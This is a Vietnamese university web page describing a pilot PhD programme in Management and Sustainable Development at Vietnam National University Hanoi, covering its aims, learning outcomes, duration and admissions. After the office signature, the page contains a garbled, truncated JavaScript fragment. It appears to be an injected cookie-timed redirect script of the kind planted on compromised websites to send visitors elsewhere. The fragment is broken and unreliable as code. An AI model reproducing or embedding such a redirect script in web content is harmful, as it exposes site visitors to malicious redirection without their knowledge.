Chương trình đào tạo Tiến sĩ Quản trị và phát triển bền vững (DMS)

Chương trình đào tạo Tiến sĩ Quản trị và Phát triển bền vững được xây dựng nhằm đào tạo các tiến sĩ chuyên ngành quản trị liên ngành, những người có trình độ thực hiện được các nghiên cứu độc lập. Chương trình đào tạo này có thể đưa ra được các luận cứ khoa học về lĩnh vực quản trị và phát triển bền vững trên phương diện là chuyên gia, góp phần cung cấp các cơ sở khoa học cho việc hoạch định chính sách phát triển cũng như điều hành doanh nghiệp.

Nghiên cứu sinh sau khi nhận được học vị tiến sĩ có thể trở thành các chuyên gia nghiên cứu, tư vấn cao cấp, giảng viên đại học, các nhà quản trị và hoạch định chính sách trong lĩnh vực quản trị công/tư, tổng giám đốc/giám đốc các tập đoàn kinh tế.

Chuẩn đầu ra của Chương trình đào tạo bậc Tiến sĩ Quản trị và Phát triển bền vững hướng tới đảm bảo Nghiên cứu sinh có kiến thức chuyên sâu về các lí thuyết quản trị, kinh tế và phát triển bền vững hiện đại, các tư duy mới trong quản trị và phát triển tổ chức, nắm vững các công nghệ quản trị doanh nghiệp hiện đại; hiểu và giải thích được cơ cấu vận hành của hệ thống quản trị tổ chức và doanh nghiệp trong bối cảnh cụ thể.

1. Hệ đào tạo: Tiến sĩ.

2. Ngành: Quản trị liên ngành (thí điểm).

3. Chuyên ngành: Quản trị và Phát triển bền vững.

4. Văn bằng: Tiến sĩ do Đại học Quốc gia Hà Nội cấp.

5. Ngôn ngữ đào tạo: tiếng Việt và tiếng Anh.

6. Thời gian đào tạo: 3-5 năm.

7. Hình thức thi tuyển: đánh giá hồ sơ, phỏng vấn chuyên môn.

8. Khung chương trình đào tạo:

{edocs}/docs/khung/03.pdf,100%,868{/edocs}

                                                                                                        Phòng Đào tạo

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’

Trả lời

Email của bạn sẽ không được hiển thị công khai.